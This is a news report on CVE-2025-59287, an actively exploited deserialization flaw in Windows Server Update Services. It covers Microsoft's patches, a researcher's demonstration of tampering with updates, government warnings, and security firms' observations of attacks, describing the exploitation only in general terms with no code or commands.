Governments and private security experts have raised alarms regarding a significant vulnerability in Microsoft Windows Server Update Services (WSUS), which is reportedly being actively exploited. This flaw, identified as CVE-2025-59287, has been assigned a critical rating of 9.8 out of 10 on the CVSS scale and affects Windows Server versions from 2012 to 2025.
The vulnerability arises from insecure deserialization of untrusted data, enabling unauthenticated attackers to execute arbitrary code on susceptible systems. Notably, systems without the WSUS role enabled remain unaffected.
Microsoft initially addressed this issue with a patch on October 14, coinciding with “Patch Tuesday.” However, this patch did not fully resolve the vulnerability, prompting the company to release an emergency update later. Nonetheless, security researcher Kevin Beaumont has indicated that the latest out-of-band update is not entirely secure. He demonstrated that he could manipulate updates sent to client systems, potentially allowing for the distribution of malicious updates.
Beaumont stated, “I was able to tamper with the updates offered to the clients and push out malicious updates,” highlighting the risk posed by the vulnerability. He further noted that attackers could set deadlines for the installation of their payloads, enabling mass installations at specified times.
In light of these developments, the US Cybersecurity and Infrastructure Security Agency has added CVE-2025-59287 to its Known Exploited Vulnerabilities catalog, while the Dutch National Cybersecurity Center has issued warnings regarding ongoing exploitation activities. Experts have observed that if an unpatched WSUS instance is online, it is likely already compromised.
Private security firms, including Huntress, reported that attackers began targeting WSUS instances exposed on default ports as early as late October, exploiting the deserialization vulnerability through the AuthorizationCookie. The exploitation has involved utilizing the WSUS service binary to execute commands and gather sensitive information, which is then exfiltrated via a remote webhook. Attackers have employed proxy networks to obfuscate their activities, complicating detection efforts.
Despite Huntress noting fewer than 25 vulnerable hosts observed during their investigations, they cautioned that WSUS is not commonly exposed on these ports. Conversely, WatchTowr CEO Benjamin Harris expressed concerns over the potential for widespread exploitation, stating, “If an unpatched WSUS instance is online, at this stage it has likely already been compromised.” He emphasized that organizations with exposed WSUS systems need to reassess their security posture.
The exploitation of this vulnerability presents a serious risk, especially for sensitive organizations that are often prime targets for attackers. Microsoft has not provided detailed responses to inquiries about the exploitation status and continues to assert that customers who have applied the latest updates are protected.
